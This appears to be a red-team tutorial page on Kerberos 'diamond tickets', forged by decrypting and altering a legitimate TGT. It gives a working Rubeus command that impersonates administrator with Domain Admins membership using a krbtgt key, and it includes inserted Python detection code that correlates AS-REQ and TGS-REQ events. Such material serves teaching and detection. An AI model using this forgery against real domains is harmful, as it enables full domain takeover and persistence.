Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because a domain controller does not keep track of the TGTs it has legitimately issued, it will happily accept any TGT that is encrypted with its own krbtgt hash.

Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQ will have a preceding AS-REQ.
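The detection heuristic described above, as an added example that is not part of the original page: a small correlation of Windows Kerberos audit events (4768 for AS-REQ, 4769 for TGS-REQ) that flags a TGS-REQ with no preceding AS-REQ from the same client address, and shows why a diamond ticket slips past it. The event records, the correlation key (client address) and the follow-up account-name check are assumptions made for this example.

```python
"""Correlate 4768 (AS-REQ) and 4769 (TGS-REQ) events to implement the
'TGS-REQ without a corresponding AS-REQ' golden-ticket heuristic."""
from datetime import datetime, timedelta

# Constructed sample events (not real logs); only the fields the heuristic needs.
EVENTS = [
    # Normal logon: AS-REQ for bob, then a service ticket request from the same host.
    {"time": "2024-01-01T09:00:00", "id": 4768, "client": "10.0.0.5", "account": "bob"},
    {"time": "2024-01-01T09:00:02", "id": 4769, "client": "10.0.0.5", "account": "bob", "service": "cifs/fs01"},
    # Golden ticket: forged offline, so the host never sent an AS-REQ at all.
    {"time": "2024-01-01T09:10:00", "id": 4769, "client": "10.0.0.9", "account": "administrator", "service": "cifs/dc01"},
    # Diamond ticket: a genuine AS-REQ for bob, then a TGS-REQ using the modified TGT.
    {"time": "2024-01-01T09:20:00", "id": 4768, "client": "10.0.0.7", "account": "bob"},
    {"time": "2024-01-01T09:20:05", "id": 4769, "client": "10.0.0.7", "account": "administrator", "service": "cifs/dc01"},
]


def correlate(events, window=timedelta(hours=10)):
    """Pair each TGS-REQ with the most recent AS-REQ from the same client address
    within `window` (10 h is the default TGT lifetime). Yields (tgs, as_or_None)."""
    last_as = {}  # client address -> most recent AS-REQ event
    pairs = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4768:
            last_as[ev["client"]] = ev
        elif ev["id"] == 4769:
            prior = last_as.get(ev["client"])
            if prior and t - datetime.fromisoformat(prior["time"]) > window:
                prior = None  # too old to be the TGT behind this request
            pairs.append((ev, prior))
    return pairs


def tgs_without_as(events):
    """The heuristic from the text: TGS-REQs with no preceding AS-REQ from that host.
    Catches the golden ticket, but not the diamond ticket (its AS-REQ was real)."""
    return [tgs for tgs, as_ in correlate(events) if as_ is None]


def account_mismatch(events):
    """Follow-up check (an assumption of this example): the preceding AS-REQ exists
    but named a different account than the one the presented TGT now carries."""
    return [tgs for tgs, as_ in correlate(events)
            if as_ is not None and as_["account"] != tgs["account"]]
```

Running `tgs_without_as(EVENTS)` returns only the 10.0.0.9 request, while `account_mismatch(EVENTS)` returns only the 10.0.0.7 request.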

Diamond tickets can be created with Rubeus:

Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap

  • /tgtdeleg uses the Kerberos GSS-API to obtain a usable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host.

  • /ticketuser is the username of the user to impersonate.

  • /ticketuserid is the domain RID of that user.

  • /groups is the list of desired group RIDs (512 being Domain Admins).

  • /krbkey is the krbtgt AES256 hash.

Rubeus describe will now show that this is a TGT for the target user.

Rubeus.exe describe /ticket:doIFYj ...snip... MuSU8=
